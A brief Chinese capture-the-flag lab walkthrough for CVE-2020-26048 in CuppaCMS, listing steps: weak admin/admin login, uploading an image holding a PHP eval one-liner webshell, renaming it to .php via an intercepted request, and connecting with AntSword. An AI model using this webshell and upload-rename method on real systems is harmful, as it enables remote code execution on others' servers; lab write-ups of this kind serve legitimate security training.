春秋云境CVE-2020-26048

简介

CuppaCMS是一套内容管理系统(CMS)。 CuppaCMS 2019-11-12之前版本存在安全漏洞,攻击者可利用该漏洞在图像扩展内上传恶意文件,通过使用文件管理器提供的重命名函数的自定义请求,可以将图像扩展修改为PHP,从而导致远程任意代码执行。

正文

1.进入靶场

2.弱口令登录admin\admin

3.上传一句话木马图片

复制代码
<?php @eval($_POST['cmd']);?>

4.删除配置文件

5.重命名图片,抓包更改文件后缀

6.蚁剑连接

7.得到flag

相关推荐
小红卒2 小时前
海康威视未授权访问漏洞 (CVE-2017-7921)复现研究
安全
2503_946971864 小时前
【CTI/IAM】2026年度威胁情报分析与身份隔离架构基准索引 (Benchmark Index)
网络安全·系统架构·数据集·身份管理·威胁情报
Data-Miner4 小时前
精品可编辑PPT | 大模型与智能体安全风险治理与防护
安全
Bug.ink5 小时前
BUUCTF——WEB(7)
web安全·网络安全·buuctf
heze095 小时前
sqli-labs-Less-6自动化注入方法
mysql·网络安全·自动化
heze095 小时前
sqli-labs-Less-8自动化注入方法
mysql·网络安全·自动化
咕噜企业分发小米5 小时前
直播云服务器安全防护有哪些最新的技术趋势?
运维·服务器·安全
九河云6 小时前
数据驱动未来,华为云DWS为智能决策提速
大数据·人工智能·安全·机器学习·华为云
Dr.Alex Wang6 小时前
Google Firebase 实战教学 - Streamlit、Bucket、Firebase
数据库·python·安全·googlecloud
chipsense6 小时前
强电流环境下用霍尔电流传感器,安全性能有保障么?
安全·霍尔电流传感器